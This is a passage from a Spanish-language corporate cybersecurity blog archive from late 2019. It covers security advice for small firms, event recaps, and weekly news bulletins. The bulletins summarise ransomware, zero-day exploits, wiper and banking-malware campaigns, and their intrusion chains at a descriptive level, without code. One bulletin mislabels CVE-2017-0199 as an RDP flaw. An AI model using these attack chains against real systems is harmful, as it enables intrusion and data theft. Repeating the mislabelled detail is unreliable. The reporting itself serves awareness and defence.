evitar el uso de SHA1 en nuevos proyectos y su reemplazo siempre que sea posible. Más información: https://media.telefonicatech.com/telefonicatech/uploads/2021/1/103379_014.pdf
10 de enero de 2020
La importancia de la ciberseguridad en las Pymes
¿Sabías que las pymes representan a la mayoría de trabajadores españoles, rondando el 70 % de los inscritos en la Seguridad Social? Este porcentaje demuestra lo importante que es y debe ser la ciberseguridad en las pymes para proteger la información tanto de clientes y empleados como de la propia empresa. En la actualidad, vivimos en una época totalmente tecnológica donde es muy común leer a diario noticias sobre ataques informáticos que han sufrido distintas empresas, como el robo de información o malware. Aunque cuesta creerlo, estos ataques se producen con mayor frecuencia en las pymes, cuentan con una menor inversión en la seguridad de sus redes y equipos, lo que implica que la intrusión resulte mucho más accesible. Por ello, es muy importante que las diferentes compañías, sean del tamaño que sean, tengan consciencia del riesgo potencial que supone el día a día en su trabajo, ya sea tratando con datos importantes de clientes, mediante el movimiento de información a través los dispositivos móviles o de los ordenadores, y que la mejor forma de proteger toda esta información es realizar una mayor inversión en seguridad digital. La gran mayoría de pymes caen en el error de pensar que, por su volumen de negocio, su información acerca de los clientes o datos no genera ningún tipo de interés para los cibercriminales, y por ello, deciden dejarlo en segundo lugar, abandonando la idea de protegerlos, o no consideran invertir en mejorar la seguridad. Primeros pasos para proteger una pyme Securizar la página web. Para muchas empresas la página web es el escaparate de su negocio. Cuidar que el contenido de la misma sea veraz y no introduzca diferentes malware en los equipos de sus clientes es indispensable. Un sencillo hackeo puede modificar el contenido de la web, introducir SPAM, robarnos datos de los formularios… Y si tienes un negocio online, con más razón. Proteger el email de los empleados. El correo electrónico es la principal vía de entrada de software malicioso. Además, sin conocer los riesgos de este acto, lo utilizamos para enviar contraseñas, enlaces de descarga y multitud de información sensible. Pero, ¿realmente conocemos si ese correo viaja hasta el buzón del destinatario mediante un canal seguro? Redes wifi abiertas. La mayoría de empresas, en este caso suelen ser grandes empresas, ponen redes a disposición de visitantes o clientes para que puedan conectarse a internet. O a los discos en red, o al servidor de la empresa. ¿Todo esto está correctamente asegurado? Los propios empleados. Las personas son el mayor riesgo dentro de una compañía, la mayoría de las veces por desconocimiento a realizar adecuadamente los procedimientos de seguridad. hay veces que por una acción equívoca como es clicar en enlaces de emails o en webs puede llevarnos a infecciones en nuestros ordenadores muy difíciles de complicar. Formación y protección son necesarias para que no pase este tipo de sucesos. Como conclusión, cada vez está más claro que las pymes deben centrarse incluso más que las grandes empresas en la ciberseguridad.
26 de diciembre de 2019
Qué hemos presentado en el Security Innovation Day 2019: Clausura por Chema Alonso (VI)
Para dar por concluido nuestros post resumen del evento más importante de innovación en ciberseguridad os traemos la charla de nuestro Chairman Chema Alonso. En la ponencia de Chema, la encargada de cerrar el evento, nuestro Chairman decició realizar un recorrido de los últimos hacks, herramientas, fugas de información y riesgos personales que hemos ido investigado en los últimos tiempos con la llegada de la conexión ubicua, las plataformas de Big Data y el mundo de la Inteligencia Artificial. Disfruta de la ponencia completa en este vídeo: Descubre qué contaron nuestros expertos en el resto de ponencias:
24 de diciembre de 2019
Los mejores posts del año sobre ciberseguridad
Con el nuevo año a la vuelta de la esquina, para hacer un buen repaso del 2019 queremos compartir los mejores post del año sobre ciberseguridad. Descubre los momentos más importantes de año a través de estos artículos publicados por nuestros expertos. ¡Hasta el año que viene! Informe de tendencias en ciberseguridad 2019 ¿Qué mejor manera de comenzar este resumen que con un informe de tendencias en ciberseguridad de 2019? En este whitepaper, realizado por el Área de Innovación y Laboratorio, se hacía balance de las novedades que traía el nuevo año en ciberseguridad: principales riesgos y amenazas, preocupaciones de los CISOs y las soluciones que propone la industria, en este completo informe. El ataque a la infraestructura de OpenPGP, consecuencias de las acciones de un “hijo de…” Uno de los artículos más exitosos, escrito por Sergio de los Santos, analiza el ataque a la infraestructura OpenPGP y la polémica generada. Un desastre sin precedentes que hizo reaccionar de esta manera a Robert J. Hansen, la persona que comunicó el incidente. CYBER SECURITY El ataque a la infraestructura de OpenPGP, consecuencias de las acciones de un “hijo de…” 1 de julio de 2019 Cómo analizar documentos con FOCA en diez pasos Como no podía ser de otra manera, nuestra herramienta estrella, FOCA, tiene un lugar privilegiado en nuestro top del año. En esta ocasión, nuestro experto del departamento de Ideas Locas de Telefónica, Fran Ramírez, explica cómo analizar documentos fácilmente, personales y de tu organización, utilizando nuestra herramienta gratuita. CYBER SECURITY Cómo analizar documentos con FOCA en diez pasos (o menos) 26 de junio de 2019 Descubriendo APTualizador: el APT que parchea Windows Detectar y analizar incidentes es una de las especialidades de nuestros expertos de Innovación y Laboratorio. En este caso se centran en un incidente ocurrido en junio, concretamente en un malware que parcheaba Windows, ¿interesante, verdad? Toda la información en el post. CYBER SECURITY Descubriendo APTualizador: el APT que parchea Windows 29 de julio de 2019 Cómo se está disfrazando Emotet y el malware de macro en los últimos tiempos Uno de los malware más dañinos de este año ha sido sin duda Emotet. En este artículo explicamos varias maneras que ha utilizado este software malicioso para ocultarse. CYBER SECURITY Cómo se está disfrazando (y ocultando) Emotet y el malware de macro en los últimos tiempos 5 de noviembre de 2019 Ciberseguridad: aprende cómo implementarla desde cero En este interesante artículo, uno de los más leídos del año, nuestro CSA Gabriel Bergel explica cómo comenzar a implementar ciberseguridad. ¡Un must read en toda regla! CYBER SECURITY Ciberseguridad: aprende cómo implementarla desde cero (Parte 1) 30 de mayo de 2019 #NoticiasCiberseguridad: boletín semanal Una de las inciativas más exitosas de este año son los boletines semanales que publicamos con las noticias sobre ciberseguridad más relevantes, analizadas y explicadas por nuestros expertos del Security Cyberoperations Center. CYBER SECURITY #NoticiasCiberseguridad: Boletín de ciberseguridad semanal 25-29 de noviembre 29 de noviembre de 2019 Pymes y ciberseguridad, ¿por dónde empiezo? Si algo nos ha enseñado este año 2019 es que la ciberseguridad es cada vez más importante para las empresas, especialmente en las pymes. Aprende cómo empezar en este completo artículo. CYBER SECURITY Pymes y ciberseguridad, ¿por dónde empiezo? 18 de julio de 2019 Descarga gratis nuestro nuevo libro: "Decisiones Irracionales en Ciberseguridad" Hace sólo unas semanas presentamos este libro gratuito en el que, a través de 12 capítulos, explicamos cómo superar los principales sesgos, heurísticas y errores de pensamiento relacionados con la ciberseguridad. La lectura perfecta para estas navidades. CYBER SECURITY Descarga gratis nuestro nuevo libro: "Decisiones Irracionales en Ciberseguridad: Supera los errores de pensamiento que sesgan tus juicios" 2 de diciembre de 2019 Los programadores saludables desayunan cereales criptográficos todas las mañanas Uno de los temas estrella de nuestro blog es la criptografía y cómo se relaciona con la seguridad. En este interesante artículo te contamos las razones de por qué incluir la criptografía en tus desarrollos. CYBER SECURITY Los programadores saludables desayunan cereales criptográficos todas las mañanas 26 de noviembre de 2019
23 de diciembre de 2019
Qué hemos presentado en el Security Innovation Day 2019: Luchando y detectando replicantes con armas innovadoras (V)
Seguimos con nuestros post del Security Innovation Day, el evento anual de innovación en seguridad más importante para ElevenPaths. En esta ocasión, llega el turno del equipo de Innovación y Laboratorio, con ponentes de la talla de Sergio de los Santos (Director de Innovación y Laboratorio), José Torres (Tech Led del equipo de Innovación y Laboratorio), Yaiza Rubio (Technical Lead del equipo de Tokenización de Red) y Claudio Caracciolo (Team Leader de los CSAs y Coordinador del equipo de Innovación y Laboratorio de Argentina). Durante esta sesión, el equipo presentó algunas herramientas en las que están trabajando. IDoT: Identificación de IoT a través de la tecnología Capacicard y la PKI de Telefónica para que los sistemas hereden credenciales tanto del dispositivo como del usuario que lo está usando en ese momento. Rosetta: Sistema para conectar la seguridad a cualquier canal de mensajería Instantánea como WhatsaApp, Telegram… DIARIO: Detecta malware en documentos de forma inteligente sin necesidad de comprometer el contenido de los mismos. MAD: Detecta la agresividad de la publicidad en términos de invasividad en aplicaciones Android antes de instalarlas. También, nos han presentado el libro gratuito redactado por este mismo equipo titulado “Decisiones irracionales en ciberseguridad”. Cuando no tienes a tu alcance todos los datos necesarios para tomar una decisión perfectamente informada ni dispones de tiempo suficiente, ¿cómo decides? Utilizas atajos mentales, cuentas de la vieja, estereotipos, prejuicios y corazonadas. Este libro te explicará cómo te afectan al afrontar riesgos, calcular la probabilidad de incidentes o evaluar compromisos entre seguridad y coste. Además, presenta ejemplos reales en el mundo de la ciberseguridad y muestra un completo checklist para poder guiarte a la hora de tomar decisiones en solitario o en grupo. Puedes descargar de forma gratuita este libro desde aquí: https://dic.e-paths.com/ Por último, cuentan la gran importancia que tiene el papel de la comunicación de todo lo que hacemos en el Laboratorio y de la concienciación de la ciberseguridad, gran parte gracias al papel que tienen nuestros CSAs (Chief Security Ambassadors) alrededor del mundo. Presentan las diferentes actividades que tenemos con los jóvenes en busca de talento e ideas nuevas. Actualmente contamos con tres actividades distintas dirigidas: los Retos de Ciberseguridad, Big Data e Inteligencia Artificial que tenemos dentro de Telefónica, el Programa de Tutorías con la Red de Cátedras de Telefónica y el Track de Transferencia, el proyecto que crea retos de la mano de Incibe. Si queréis saber más, ¡dadle al play! Tenéis la sesión completa disponible en el vídeo.
18 de diciembre de 2019
#NoticiasCiberseguridad: Boletín de ciberseguridad semanal 9-13 de diciembre
Los ataques y vulnerabilidads más destacados de la última semana, recopiladas por nuestros expertos del Security Cyberoperations Center. El descifrador de Ryuk puede dañar archivos grandes El éxito del Ryuk en los últimos años no ha significado que sus creadores hayan dejado de evolucionarlo y mejorarlo. Una de las características menos documentada es su capacidad para cifrar parcialmente los archivos, lo que le permite ahorrar tiempo y avanzar a través de los datos lo más rápido posible antes de que alguien lo note. Los archivos parcialmente cifrados mostrarán un pie de página ligeramente diferente al normal al final del archivo. En una de las últimas versiones de Ryuk, se realizaron cambios en la forma en que se calcula la longitud del pie de página. Como resultado, el descifrador proporcionado por los autores de Ryuk truncará los archivos, cortando demasiados bytes en el proceso de descifrar el archivo. Dependiendo del tipo de archivo exacto, esto puede o no causar problemas importantes. Además, el descifrador Ryuk generalmente eliminará los archivos que cree que se descifraron correctamente. Por tanto, antes de ejecutar cualquier descifrador de ransomware, se recomienda realizar primero una copia de seguridad de los datos cifrados. Más información: https://blog.emsisoft.com/en/35023/bug-in-latest-ryuk-decryptor-may-cause-data-loss/amp/ Boletín de actualizaciones de Microsoft Microsoft ha lanzado las actualizaciones de seguridad de su Patch Tuesday de diciembre de 2019. Las actualizaciones de este mes incluyen actualizaciones para 36 vulnerabilidades además de dos alertas sobre otros problemas de seguridad. De estas 36 vulnerabilidades, 7 se han clasificado como Críticas, 27 como Importantes, una como Moderada y una como Baja. Además, una de las vulnerabilidades importantes (CVE-2019-1458) es un zero-day para Windows que ya ha sido explotado. Otros vulnerabilidades catalogadas como críticas parcheadas este mes y que suponen un riesgo grave de ser utilizadas en campañas de malware o ataques dirigidos son el CVE-2019-1468 (una ejecución remota de código en el componente Win32k) y el CVE-2019-1471 (un error de ejecución remota de código en el Kit de herramientas de virtualización de Windows Hyper-V). Como curiosidad, indicar que Microsoft ha corregido también una vulnerabilidad catalogada como importante (CVE-2019-1489), que es otra vulnerabilidad más en el cliente RDP de Windows y que sólo aplica a Windows XP Service Pack 3, el cual ya no recibe actualizaciones de seguridad. Más información: https://patchtuesdaydashboard.com/ Exploit 0-day en Windows utilizado en la Operation WizardOpium Se ha descubierto un nuevo exploit para una vulnerabilidad 0-day de elevación de privilegios (CVE-2019-1458) en Windows que habría sido ya usado en los ataques de la llamada Operation WizardOpium. Este nuevo fallo explotado se habría detectado durante la cadena de explotación de una vulnerabilidad en Google Chrome reportada anteriormente (CVE-2019-13720), y se utilizaría para obtener mayores privilegios en el equipo infectado, así como realizar acciones fuera de la sandbox de Chrome. El exploit consta de un PE que corrompe algunos punteros de la memoria para redirigir la ejecución del código al "PE loader". Esto permitiría evadir las restricciones de la sandbox ya que el exploit no puede iniciar nuevos procesos utilizando las funciones nativas de WinAPI. Este exploit afectaría directamente al driver win32k.sys. Si el atacante consigue explotar esta vulnerabilidad, podría ejecutar código arbitrario en el espacio del kernel permitiendo así instalar programas, ver, cambiar o eliminar datos, e incluso crear nuevas cuentas con todos los permisos. Existen parches disponibles para esta vulnerabilidad. Si el atacante consigue explotar esta vulnerabilidad, podría ejecutar código arbitrario en el espacio del kernel permitiendo así instalar programas, ver, cambiar o eliminar datos, e incluso crear nuevas cuentas con todos los permisos. Existen parches disponibles para esta vulnerabilidad. Más información: https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/ Anchor - Nuevo proyecto de desarrollo de los operadores de TrickBot Un grupo asociado con TrickBot se habría embarcado en un proyecto para rediseñar y complementar este malware en un framework totalmente funcional con múltiples herramientas de intrusión, extracción de datos y persistencia. El proyecto, de nombre Anchor, consiste en una herramienta que facilitaría permanecer en los equipos infectados sin ser detectados durante semanas o meses mientras se roban los datos en ataques dirigidos a grandes empresas. Entre sus módulos incluye la capacidad de moverse lateralmente en la red, instalar puertas traseras, atacar terminales punto de venta para obtener datos de tarjetas y limpiar los sistemas tras la infección para ocultar su rastro. El grupo norcoreano Lazarus Group se ha visto relacionado recientemente con TrickBot y este nuevo proyecto, del cual comprarían el acceso a sistemas ya infectados para posteriormente instalar la puerta trasera PowerRatankba. Más información: https://labs.sentinelone.com/the-deadly-planeswalker-how-the-trickbot-group-united-high-tech-crimeware-apt/ GALLIUM: Campaña contra el sector de las telecomunicaciones Microsoft Threat Intelligence Center ha publicado un artículo detallando una campaña contra proveedores de telecomunicaciones por parte de un grupo al que han denominado GALLIUM. Para lograr el compromiso inicial de los sistemas, el grupo apunta a servicios de Internet sin parchear utilizando exploits disponibles públicamente y vulnerabilidades en WildFly/JBoss. La identificación de sus objetivos es probable que se base en la utilización de herramientas de investigación en fuentes abiertas y en el escaneo de redes. Una vez conseguido el acceso a la red, GALLIUM utiliza técnicas como Mimikatz para la obtención de credenciales que les permitirán movimiento lateral en la red. Varias características destacadas de este grupo es que no tratan de ofuscar sus intenciones y que utilizan herramientas disponibles de forma pública con pequeñas modificaciones; es decir, utilizan una infraestructura de bajo coste y fácil de reemplazar. Microsoft indica que la actividad de GALLIUM habría tenido lugar fundamentalmente a lo largo de 2018 y hasta mediados de 2019, habiendo decrecido sus niveles de actividad si bien se mantienen activos. Si bien Microsoft no lo menciona en su artículo, algunos medios especializados apuntan a las similitudes entre las TTPs identificadas para GALLIUM y la campaña reportada por investigadores de Cybereason que habría tenido lugar también en 2018 contra proveedores de telecomunicaciones y que se conoció con el nombre de Operation SoftCell. Más información: https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/ Si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de Innovación y Laboratorio de ElevenPaths. Visita el canal de Telegram y estate al día en seguridad digital.
13 de diciembre de 2019
Qué hemos presentado en el Security Innovation Day 2019: Innovación y diversidad en ciberseguridad (IV)
Tras hablar del futuro de las SecOps y la automatización gracias a la IA, presentar varias proyectos innovadores de Start-ups y analizar cómo mejorar la resistencia frente a ataques de denegación de servicios (DDoS), seguimos con el resumen del pasado Security Innovation Day 2019, nuestro evento anual de innovación en seguridad, en esta ocasión inspirado en la película Blade Runner y el lema Guards for Digital Lives. Como no podía ser de otra manera en un evento de estas características, la innovación tuvo un papel protagonista. Quisimos reservar un espacio para que, ponentes de diferentes ámbitos hablasen sobre diversidad en ciberseguridad en una mesa redonda muy completa e interesante. Mesa redonda sobre diversidad Para conducir la conversación, una vieja conocida de ElevenPaths y nuestros eventos: Julia Perea, Digital Security Director Telefónica España, que subrayaba lo comentado por Paloma Castellano: "la seguridad es cuestión de supervivencia, los malos evolucionan y se desarrollan y los buenos no nos podemos quedar atrás". Continuaba presentando a los invitados, según la propia Julia "totalmente diversos en prisma, culturalmente y con maneras diferentes de ver la diversidad en su día a día. Sentados a la mesa estaban Juan Cobo (Global CISO Ferrovial), Laura Castela (Head of 42 Madrid Fundación Telefónica) y Natalia Moreno (CyberThreats Security Analyst Telefónica). Innovación en ciberseguridad El primer tema a tratar fue, como no podía ser de otra manera, la innovación. Como parte del ADN de Ferrovial, Juan Cobo iniciaba su intervención destacando lo complejo y complicado del reto al que se enfrenta uniendo innovación y ciberseguridad. La manera de diferenciarte y sobrevivir hoy en día es innovar. Juan Cobo, Global CISO de Ferrovial Laura Castela cogía el testigo para comentar cómo desde Fundación Telefónica llevan más de 20 años innovando en educación, haciendo que las cosas sucedan y saliendo a buscar metodologías que haya fuera, como han hecho adaptando el modelo 42. 42 es sinónimo de Innovación en mayúsculas. Es un proyecto innovador que viene a romper los paradigmas de la educación más tradicional. Laura Castela, Head of 42 Madrid Fundación Telefónica Cerraba el bloque Natalia Moreno, explicando que la innovación para el servicio de CyberThreats se entiende como algo fundamental, y cómo consiguen innovar a través de escuchar a los clientes, entender cuáles son sus objetivos y adaptándose a ellos. Además de personas con conocimiento de tecnología y seguridad, para innovar utilizamos una herramienta: la escucha. Natalia Moreno, CyberThreats Security Analyst Telefónica ¿Qué es la diversidad? Comenzaba Julia Perea este segundo bloque aclarando que desde Telefónica se entiende la diversidad desde el punto de vista de género, cultural, el background, de pensamiento, etc. Como algo obligatorio en cualquier empresa si se quiere innovar y ser competitiva. Las empresas que manejan bien la diversidad y la gestionan se presentan mejor ante una crisis económica e innovan más en su enfoque de negocio. Julia Perea, Digital Security Director Telefónica España "Para Ferrovial la diversidad es riqueza, y es normalidad", comentaba Juan. Al tratarse de una empresa multinacional, la diversidad se vive en el día a día de la compañía y se toma como algo muy rico y positivo. De la misma manera, Natalia apuntaba que no existe la posibilidad de ser exitoso sin diversidad, en todos los sentidos: género, origen, generación, formación y un largo etcétera. En el caso de 42, la diversidad está muy clara. Ya que cuenta con alumnos de todas las edades y procedencias en este nuevo estilo educativo, en el que se mezclan competencias, tanto digitales y tecnológicas como soft skills a las que no se le ha prestado demasiado atención hasta ahora. Diversidad de género Que el número de mujeres en el ámbito tecnológico y las carreras STEM es bajo es un hecho, pero la brecha se va cerrando gracias a iniciativas como las que apoya Telefónica: Girls Inspire Tech, #MujeresHacker, WiCS (Women in Cybersecurity in Spain). Las mujeres siguen tomando importancia y, poco a poco, las cosas se van nivelando aunque todavía queda mucho por hacer. Una ponencia muy interesante que también puedes disfrutar íntegramente en el siguiente vídeo: Descubre qué contaron nuestros expertos en el resto de ponencias:
11 de diciembre de 2019
#NoticiasCiberseguridad: Boletín de ciberseguridad semanal 2-6 de diciembre
Segunda edición de nuestro boletín semana del noticias sobre ciberseguridad. Los ataques y vulnerabilidades más relevantes, analizadas por nuestros expertos del SCC: Strandhogg: vulnerabilidad en Android que permite obtener credenciales bancarias Un fallo en el software Android de Google, al que han denominado StrandHogg, estaría siendo explotado para crear aplicaciones capaces de robar las credenciales de aplicaciones bancarias. El error reside en la función multitarea de Android que podría ser explotado por una aplicación maliciosa para hacerse pasar por una legítima ya instalada y permitiría a los atacantes crear pantallas de inicio de sesión falsas que se podrían insertar en aplicaciones legítimas para recopilar datos de la víctima. Los investigadores habrían descubierto que 60 instituciones financieras distintas estarían siendo atacadas a través de estas aplicaciones maliciosas y habrían conseguido el objetivo final, robar dinero de la víctima. Google ha suspendido las aplicaciones potencialmente dañinas que han sido detectadas. Esta vulnerabilidad todavía no ha sido parcheada. Wiper ZeroCleare dirigido contra empresas energéticas en Oriente Medio Investigadores de IBM han identificado y analizado un nuevo malware destructivo desarrollado por actores amenaza iraníes que estaría siendo activamente utilizado contra empresas energéticas situadas en Oriente Medio. El wiper, al que han denominado ZeroCleare, muestra evidentes similitudes con uno de los malware más destructivos de la pasada década, Shamoon, y está diseñado para eliminar la mayor cantidad de datos posible en el sistema infectado. Como vector de entrada se realizan ataques de fuerza bruta contra activos de la red corporativa escasamente securizados. Una vez dentro se explotan vulnerabilidades en SharePoint para instalar una shell como China Chopper o Tunna. Posteriormente, se busca el movimiento lateral a lo largo de la red para conseguir infectar la mayor cantidad de dispositivos posibles. El último paso consiste en desplegar el wiper ZeroCleare. Este malware se vale de scripts maliciosos en PowerShell para evadir los controles de Windows y eleva privilegios mediante la descarga de la herramienta legítima EldOS RawDisk. Se desconoce qué empresas se han visto ya afectadas, pero los ataques parecen altamente dirigidos contra entidades con negocios petroleros en Arabia Saudí o colaboradores de estas entidades. Posible filtración de datos de clientes de Caja Rural Según ha dado a conocer el diario digital “El Confidencial”, el Grupo Caja Rural habría sufrido una exposición de datos de sus clientes. Según indica este medio, estarían afectados un total de 637 clientes, principalmente de Castilla y León, habiendo quedado expuesta información personal como es su DNI, nombre y apellidos, hash de contraseña, dirección del domicilio y número de teléfono móvil. Por el momento no se sabría cómo se ha producido dicha filtración, si por una brecha en su sistema, o por un ataque. La entidad afectada ha negado este incidente, aunque se sabe que en octubre el Banco Cooperativo Español, que forma parte de Caja Rural, notificó un incidente a la Agencia Española de Protección de Datos, si bien se desconoce si está relacionado o no. BlackDirect: vulnerabilidad en Microsoft Azure Se ha encontrado una vulnerabilidad en Microsoft Azure denominada BlackDirect que permitiría tomar el control de cuentas de Microsoft y Azure. El fallo se encuentra en las aplicaciones propias de Microsoft Azure llamadas "Enterprise Applications", que usan el protocolo OAuth y contienen una lista de URLs en las que confían. Los atacantes podrían tomar el control de estas URLs, lo que les permitiría utilizar los permisos de la víctima para obtener los "tokens de usuario". Una vez conseguidos los tokens, podrían hacerse pasar por la víctima y realizar todas las acciones que el usuario puede hacer, por lo que la gravedad depende de los permisos del usuario afectado. Cualquiera que tenga cuentas de Microsoft o Azure sería vulnerable a este tipo de ataque. Las URLs vulnerables descubiertas han sido corregidas, eliminando el riesgo. Sin embargo, podría haber más aplicaciones de Azure vulnerables. Explotación de vulnerabilidad parcheada de Outlook Se ha descubierto un nuevo truco utilizado por agentes amenaza que está siendo empleado para llevar a cabo grandes intrusiones revirtiendo la funcionalidad del parche de Microsoft para la vulnerabilidad CVE-2017-11774 en Microsoft Outlook. A pesar de las múltiples advertencias de FireEye y el US Cyber Command, se ha seguido observando un aumento en la explotación exitosa de CVE-2017-11774, un ataque contra Outlook en el lado del cliente que implica la modificación de las páginas de inicio de Outlook de los clientes para la ejecución y persistencia del código. Hay que tener en cuenta que para que el vector de anulación del parche CVE-2017-11774 tenga éxito, un atacante tiene que persuadir a la víctima para que ejecute su programa y modifique su sistema operativo. Sin embargo, se trata de una técnica poco común para la que no hay una guía de mitigación pública disponible y que, según indican los investigadores, permite automatizar por completo el acceso inicial y la anulación de los parches. Si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de Innovación y Laboratorio de ElevenPaths. Visita el canal de Telegram y estate al día en seguridad digital.
5 de diciembre de 2019
Qué hemos presentado en el Security Innovation Day 2019: Mejorando la resistencia entre ataques distribuidos de denegación de servicios (III)
La última edición de nuestro evento de innovación en ciberseguridad, el Security Innovation Day, dio para mucho. En esta serie de posts analizamos los temas tratados, tras explicar qué se contó en "Futuro de las SecOps, de la automatización a la Inteligencia Artificial" y "Open Innovation Village, Start-ups y centros de innovación", hoy nos centramos en la ponencia titulada Mejorando la resistencia entre ataques distribuidos de denegación de servicios que trataba, como no podía ser de otra manera, en los conocidos Ataques DDoS. Tipos de ataque DDoS Comenzaba su intervención Gloria Nieto, Network Security Manager Telefónica explicando a grandes rasgos en qué consisten este tipo de ataques y qué objetivos tienen: básicamente tumbar el servicio, Gloria se aterrizaba este concepto hablando del "cierre de nuestras tiendas digitales dejándonos sin negocio", por lo que resulta clave que el tiempo de respuesta sea el mínimo posible con el objetivo de mitigarlo. Pasando después a explicar los tipos de ataque, sus características y cómo han evolucionado (sobre todo en volumen) en los últimos años. Respuesta ante ataques Continuaba Alejandro Ramos, Global Chief Security Operations Officer ElevenPaths. hablando de la parte de respuesta a los ataques, destacando que cada vez es más habitual que las empresas grandes y medianas cuenten con medidas específicas para protegerse ante estos ataques y la necesidad de probar los sistemas de seguridad para que cuando lleguen los ataques, sepamos a ciencia cierta que esos sistemas son seguros y están preparados. Si te has quedado con ganas de saber más sobre lo que contaron nuestros expertos, ya está disponible el vídeo con la ponencia. ¡Que lo disfrutes, hacker! Descubre qué contaron nuestros expertos en el resto de ponencias:
4 de diciembre de 2019
Celebra con nosotros el #DíaMundialDeLaCiberseguridad
¡Hacker, hoy es nuestro día! Dejando el Black Friday de lado, queremos celebrar el Día Internacional de la Ciberseguridad, 30 de noviembre, con todos vosotros. ¿Sabías que este día fue convocado por la Association for Computing Machinery? El objetivo que tiene es crear conciencia sobre la importancia de la seguridad de la información y de los sistemas que operan en torno a ella. Para celebrar este día, os traemos los cinco post más leídos de nuestro blog, centrados en ciberseguridad y ataques. CYBER SECURITY El ataque a la infraestructura de OpenPGP, consecuencias de las acciones de un “hijo de…” 1 de julio de 2019 CYBER SECURITY Cómo analizar documentos con FOCA en diez pasos (o menos) 26 de junio de 2019 CYBER SECURITY Los programadores saludables desayunan cereales criptográficos todas las mañanas 26 de noviembre de 2019 CYBER SECURITY Nueve de cada diez expertos en ciberseguridad recomiendan un antivirus sin azúcar: el tamaño de la muestra importa 17 de septiembre de 2019 CYBER SECURITY Descubriendo APTualizador: el APT que parchea Windows 29 de julio de 2019
30 de noviembre de 2019
#NoticiasCiberseguridad: Boletín de ciberseguridad semanal 25-29 de noviembre
Iniciamos esta serie de boletines semanales en las que os traemos las noticias más relevantes de ciberseguridad que han ocurrido en los últimos días: Ciberataque mediante ransomware contra Prosegur Ayer, 27 de noviembre de 2019, la compañía de seguridad Prosegur realizó un comunicado donde reconocía haber sido víctima de un ataque por un virus de tipo ransomware, que secuestra los dispositivos infectados para después pedir un rescate a la víctima. La compañía se vio obligada a aplicar los protocolos de emergencia y restringir las comunicaciones con los clientes para evitar la propagación. La afectación se ha producido a nivel global en todos los países en los que opera la empresa. Según ha informado Prosegur en su cuenta de Twitter, el vector de entrada podría haber sido Emotet y el virus desplegado se trataría del ransomware Ryuk. Este ransomware ya apareció mencionado en relación con los ataques sufridos por Everis y la Cadena SER a principios de mes, así como Sacyl la semana pasada y el Ayuntamiento de Jerez este último verano. Exposición de datos de 1.200 millones de usuarios En los últimos días se ha conocido la existencia de un servidor de ElasticSearch que contenía cerca de cuatro mil millones de registros de usuarios, lo que equivaldría a 4 teras de información sobre mil doscientos millones de usuarios únicos, que habría quedado expuesto en internet sin contraseña o petición de autenticación. Entre la información expuesta se encuentran nombres, direcciones de correo electrónico, números de teléfono, perfiles de Facebook y perfiles de LinkedIn. Según los expertos que han analizado los registros, esta fuga podría tratarse de un compendio de filtraciones ya conocidas anteriormente mezcladas con datos de las empresas People Data Labs y OxyData. Se desconoce todavía cómo se produjo la exposición en este servidor, ya que éste no pertenece a ninguna de las dos empresas mencionadas en el repositorio. Malware para el robo de tarjetas de crédito en hoteles Turísticas y en el ámbito de la restauración. Dicha campaña tiene como objetivo final el robo de información asociada a reservas de clientes en sus bases de datos. La campaña utiliza como vector de entrada documentos PDF, Excel y Word manipulados; así como la explotación de una vulnerabilidad RDP (CVE-2017-0199) en Office y WordPad. Los actores amenaza registran dominios mediante técnicas de typosquatting que simulan ser el de la empresa víctima, a través de los cuales se envían correos electrónicos que contienen detalles sobre supuestas reservas hoteleras. Los mensajes, enviados en portugués, contienen adjuntos con macros maliciosos que, de ser habilitados, ejecutarán código PowerShell con el objetivo final de descargar el malware RevengeRAT/NjRAT/NanoCoreRAT u otro tipo de malware personalizado. Se cree que dos grupos amenaza distintos, denominados RevengeHotels y ProCC, estarían detrás de esta campaña de cibercrimen. Cerca de 20 empresas habrían sido víctimas del ataque, principalmente en territorio brasileño. Cientos de usuarios afectados por una fuga de datos en Twitter y Facebook Facebook y Twitter han admitido que cientos de usuarios dieron permiso para que terceras partes accedieran a sus datos personales a través de aplicaciones sin su conocimiento expreso. Las compañías han declarado que los usuarios afectados han estado utilizando sus cuentas de medios sociales para acceder a ciertas aplicaciones de Android. Investigadores de seguridad descubrieron que los SDK de One Audience y Mobiburn proporcionaban acceso a los datos confidenciales de los usuarios. La información expuesta incluía nombres de usuario, direcciones de correo electrónico, tweets recientes y mensajes en ambas plataformas. Twitter y Facebook han declarado que notificarán a los usuarios afectados. Magento Marketplace sufre un incidente de seguridad Adobe ha publicado un comunicado sobre un incidente de seguridad que ha afectado a los usuarios del portal Magento Marketplace el día 21 de noviembre. Los atacantes explotaron la vulnerabilidad que existía en Marketplace con el objetivo de acceder a la información de la cuenta de los usuarios registrados. La información confidencial expuesta incluye nombre, correo electrónico, ID del usuario (MageID), direcciones de facturación y compras, número telefónicos e información comercial. La compañía no ha publicado el alcance de las cuentas afectadas, aunque afirman que no han sido expuestos datos financieros y contraseñas. En respuesta al incidente, la compañía ha cerrado Marketplace temporalmente para corregir la vulnerabilidad. Si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de Innovación y Laboratorio de ElevenPaths. Visita el canal de Telegram y estate al día en seguridad digital.
29 de noviembre de 2019
Qué hemos presentado en el Security Innovation Day 2019: Open Innovation Village, Start-ups y centros de innovación (II)
